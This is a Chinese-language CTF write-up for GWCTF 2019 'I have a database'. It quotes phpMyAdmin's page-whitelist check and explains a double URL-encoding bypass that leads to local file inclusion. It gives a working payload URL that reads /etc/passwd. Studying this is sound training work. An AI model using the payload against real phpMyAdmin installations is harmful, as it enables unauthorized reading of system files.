当前位置：Gxlcms > 数据库问题 > [GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

时间：2021-07-01 10:21:17 帮助过：57人阅读

If we have a valid target, let‘s load that script instead if (! empty($_REQUEST[‘target‘]) && is_string($_REQUEST[‘target‘]) && ! preg_match(‘/^index/‘, $_REQUEST[‘target‘]) && ! in_array($_REQUEST[‘target‘], $target_blacklist) && Core::checkPageValidity($_REQUEST[‘target‘]) ) { include $_REQUEST[‘target‘]; exit; }

$target_blacklist，target参数黑名单

$target_blacklist = array (
    ‘import.php‘, ‘export.php‘
);

Core::checkPageValidity($_REQUEST[‘target‘])，Core类参数校验方法

 1  public static function checkPageValidity(&$page, array $whitelist = [])
 2     {
 3         if (empty($whitelist)) {
 4             $whitelist = self::$goto_whitelist;
 5         }
 6         if (! isset($page) || !is_string($page)) {
 7             return false;
 8         }
 9 
10         if (in_array($page, $whitelist)) {
11             return true;
12         }
13 
14         $_page = mb_substr(
15             $page,
16             0,
17             mb_strpos($page . ‘?‘, ‘?‘)
18         );
19         if (in_array($_page, $whitelist)) {
20             return true;
21         }
22 
23         $_page = urldecode($page);
24         $_page = mb_substr(
25             $_page,
26             0,
27             mb_strpos($_page . ‘?‘, ‘?‘)
28         );
29         if (in_array($_page, $whitelist)) {
30             return true;
31         }
32 
33         return false;
34     }

问题在于第23行的urldecode($page)方法，存在二次编码绕过

$_page = urldecode($page);

%25的url编码为%
%3f的url编码为?
%253f-->?

payLoad：
这里target参数只要不是黑名单中php文件就可以

http://725a4060-e628-4f9f-801a-e96075cbfca8.node3.buuoj.cn/phpmyadmin/index.php?target=db_datadict.php%253f../../../../../../etc/passwd

技术图片

flag应该位于系统的根目录

技术图片

[GWCTF 2019]我有一个数据库

标签：相关 amp passwd match eva 包含漏洞一个数据库文件包含漏洞 static

[GWCTF 2019]我有一个数据库

人气教程排行